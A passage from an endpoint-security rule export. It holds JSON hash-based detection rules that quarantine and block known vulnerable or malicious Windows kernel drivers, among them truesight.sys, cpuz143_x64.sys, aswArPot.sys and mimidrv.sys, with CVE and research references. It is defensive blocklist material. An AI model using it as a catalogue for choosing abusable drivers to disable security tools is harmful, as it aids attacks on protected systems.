"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483500Z", + "creation_date": "2026-03-23T11:45:31.483504Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483514Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f74d59e46f8724eb43238e00ee0877b234e22de7a660f2c226d68ce21b663451", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d8ef3cb-ed8a-505d-afca-5cc8e059e556", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462612Z", + "creation_date": "2026-03-23T11:45:30.462616Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462625Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bce2afd04ec073143a2a4ba51671992451c8e747a84852458321f2d275b5433", + "comment": "Vulnerable Kernel Driver (aka yyprotect64.sys) 
[https://www.loldrivers.io/drivers/12ccd18a-11da-495a-b4b4-98a2f2bff180/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d9ed2bc-c7e8-5772-9465-017360104ab9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828387Z", + "creation_date": "2026-03-23T11:45:31.828390Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828395Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36f3dcbb114031b79e64f0650570c9248f08ecc000bac6d778f3df8cfdc7fc3d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4da00d52-f840-562e-9110-0aeca3bda106", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143729Z", + "creation_date": 
"2026-03-23T11:45:31.143731Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143737Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98576e60b9821f44004c5b6856c75c80607fd7cb42768dd133d192846e6d9c13", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4da6ec80-5183-5988-affc-28ac774fa1c2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829916Z", + "creation_date": "2026-03-23T11:45:30.829918Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829924Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19efc37343ea49027413e197762220cdccb73103b08653b049ae9c0bf9d3cf01", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "4db3007d-e59d-5f0f-8b73-f9de3d89e13d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156274Z", + "creation_date": "2026-03-23T11:45:31.156276Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156281Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c92ddd3bd10344acda9a901384a86597cac3d1db8487b913574768a17dd9e8ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4db5b4de-3346-586d-83c8-30219a628cec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817373Z", + "creation_date": "2026-03-23T11:45:31.817375Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817381Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b730f859033c3693864b75c93b57cbccb91d2438813ecd7ef535b9cb3b6dbcc9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4db6d26f-7642-5a7d-a433-68a3e667b928", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973182Z", + "creation_date": "2026-03-23T11:45:29.973184Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973189Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e35d09a903d76810830aff2fc87bb3071026d982a334b3ee4c68f66cba865109", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4db76a93-28cd-5834-9ba2-dc6046084b27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620513Z", + "creation_date": "2026-03-23T11:45:29.620515Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620521Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4deaa4a7-0799-53a1-9616-db1afe385fb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475476Z", + "creation_date": "2026-03-23T11:45:31.475480Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475489Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "cffe0eaa5a3dc73494239a44041bfe804bc2756f5f6466fb55d23fb79cdc8e37", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4defc3fb-9847-55c8-9de3-5c17d89c8bbb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611393Z", + "creation_date": "2026-03-23T11:45:29.611395Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b2a3b74127c7ecf095e0fe5a65af31b9701d2ba6dc2a4d87882de65d84842c0", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4df13330-7987-558d-94c3-e8f399123975", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143218Z", + "creation_date": "2026-03-23T11:45:31.143220Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143226Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53617059a1ca7a85c563f86f8102fab3faa7dcb24aad2f2e7da80b8295a02c45", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4df67c07-62fb-5b61-b6af-cf43e08fc5f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468638Z", + "creation_date": "2026-03-23T11:45:30.468641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468650Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "30f9aca036adbcc15cace326e042ed3590f00045f66982afbf569d8fd9b6747b", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e0049ee-4caf-52b9-ac43-53e05c2bd6f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145090Z", + "creation_date": "2026-03-23T11:45:31.145092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145097Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "964f39b115ba8b3a0b8fb73427485c9ec308d33d50c7f07738257a7401c533d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e01b31f-8ef9-55ef-9458-971bfc126a35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616470Z", + "creation_date": 
"2026-03-23T11:45:29.616472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616477Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f06fdfe50ebc8d1d2daf5811b66288563f26a09a2ec9c2a21e2a71ff19756062", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e06ed7c-c8c1-5f24-89d9-f1842a1144c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826543Z", + "creation_date": "2026-03-23T11:45:31.826545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826551Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96e3b89240889b23351e68525bc12d9c5a9150bf8edece3debc58b4917a648d9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"4e0902b8-376c-5d1e-94d9-8b0f2cfd7b9b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454448Z", + "creation_date": "2026-03-23T11:45:30.454452Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454460Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a1dfe962c0c714c35827f7cf19bbca693bb1e769037b06b5f86d7f33b723f72", + "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e0fd229-e5b0-5467-8ca7-c70fd462e0a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479530Z", + "creation_date": "2026-03-23T11:45:30.479532Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479537Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b06dad9821beef3442cd9e775228baa56582a3a85c9d178693f3cf236623de17", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e2015db-1aec-53dd-bea5-1587cd5ad482", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611113Z", + "creation_date": "2026-03-23T11:45:29.611115Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611120Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff0857f3e3f4e6248e169e9df3fdf4dc571bc65ec731cf11be2532d9405d95d2", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e366dd1-0545-5d14-b9af-bd60eb5379b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151304Z", + "creation_date": "2026-03-23T11:45:31.151307Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151346Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5464daff8ea291c07bbfeeedd186ef81b5518239e9201c75580d94804b3bfe89", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e40be56-e33d-523b-ac2d-7ca46452cd7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968631Z", + "creation_date": "2026-03-23T11:45:29.968633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "608b352bef3e56480ede69c1641af11e5fac88e04e4cd776a9c5ae029a286b72", 
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e521e0b-5950-5522-9046-c96f29c1ad0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826497Z", + "creation_date": "2026-03-23T11:45:30.826499Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826504Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3dde98fdf64982a6272ac0e91cfa5d98b0aa7bb856338de84fa7c5e2c44471ba", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e56aa98-3812-53ce-9d40-b10dd4657ed8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617115Z", + "creation_date": "2026-03-23T11:45:29.617117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617122Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4e850e7847499e7d4c2754f8a4973fc5b4adeb728e1e142d1d35d519edf3274", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e5bed66-f133-5a85-988b-1f7be3a339e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494275Z", + "creation_date": "2026-03-23T11:45:31.494278Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494287Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "baf9a9d5cf80c5ecc293acb7655b654e943bd00aefc2afe0b805183be6d8a211", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e5c5f9c-b694-5dc6-8172-961780824a95", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829540Z", + "creation_date": "2026-03-23T11:45:31.829542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829547Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 